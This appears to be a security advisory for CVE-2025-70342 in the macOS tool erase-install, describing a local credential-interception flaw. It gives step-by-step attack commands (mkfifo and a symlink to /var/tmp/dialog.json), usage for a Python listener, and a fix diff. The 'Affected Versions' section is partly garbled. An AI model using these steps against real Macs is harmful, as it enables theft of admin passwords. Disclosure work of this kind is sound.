## https://sploitus.com/exploit?id=9B8B087E-4178-5823-B271-5825B0E829E5
# CVE-2025-70342: Credential Interception via Named Pipe in erase-install
## Summary
erase-install prior to v40.4 (commit 2c31239) writes swiftDialog credential output to a hardcoded path `/var/tmp/dialog.json`. On Apple Silicon Macs, admin credentials entered during reinstall/erase operations are written to this predictable, world-writable location. A local unprivileged attacker can create a named pipe (FIFO) at this path to intercept admin credentials in real time.
## Affected Versions
- **Vulnerable:** erase-install /dev/null > "$dialog_output"
```
On Apple Silicon Macs, erase-install prompts the admin for credentials via swiftDialog. The credentials (username + password) are written via shell redirect to `/var/tmp/dialog.json` โ a hardcoded path in a world-writable directory. The script does not check whether this path has been tampered with before writing.
### Attack Scenario
```
1. Unprivileged attacker creates a named pipe (FIFO): mkfifo /tmp/.fifo
2. Attacker creates symlink: ln -s /tmp/.fifo /var/tmp/dialog.json
3. Attacker reads from FIFO (blocks, waiting for data)
4. Admin runs: sudo erase-install.sh --erase
5. Admin enters credentials in swiftDialog prompt
6. Credentials flow through symlink โ FIFO โ attacker's terminal
```
This attack requires no special timing or race condition โ the attacker simply plants the symlink and waits.
## Proof of Concept
### Prerequisites
- Apple Silicon Mac (credential prompt only triggers on arm64)
- Any unprivileged local user account
### Usage
```bash
# Start the listener (as unprivileged user)
python3 poc.py
# Wait for admin to run erase-install with --erase or --reinstall
# Credentials will be printed to stdout when captured
# Cleanup
python3 poc.py --cleanup
```
See `poc.py` for full details.
## Remediation
- **Upgrade** erase-install to the version containing commit [2c31239](https://github.com/grahampugh/erase-install/commit/2c31239fb8519d87577514b3db9ddb0771232a21) or later
- The fix uses `mktemp` to generate a random filename, preventing path prediction:
```diff
- dialog_output="/var/tmp/dialog.json"
+ dialog_output=$(/usr/bin/mktemp /var/tmp/dialog.XXX.json)
```
## Timeline
| Date | Event |
|------|-------|
| 2024-12-23 | Vulnerability discovered |
| 2024-12-23 | Issue reported to maintainer |
| 2024-12-24 | Fix merged via PR [#574](https://github.com/grahampugh/erase-install/pull/574) |
| 2026-02-20 | CVE-2025-70342 assigned |
## Credit
- **Rambo Anderson-You**
- **cooldadhacking** ([GitHub](https://github.com/cooldadhacking))
## References
- [erase-install PR #574](https://github.com/grahampugh/erase-install/pull/574)
- [Fix commit 2c31239](https://github.com/grahampugh/erase-install/commit/2c31239fb8519d87577514b3db9ddb0771232a21)
## Disclaimer
This proof of concept is provided for educational and authorized security testing purposes only. Use responsibly and only on systems you own or have explicit permission to test.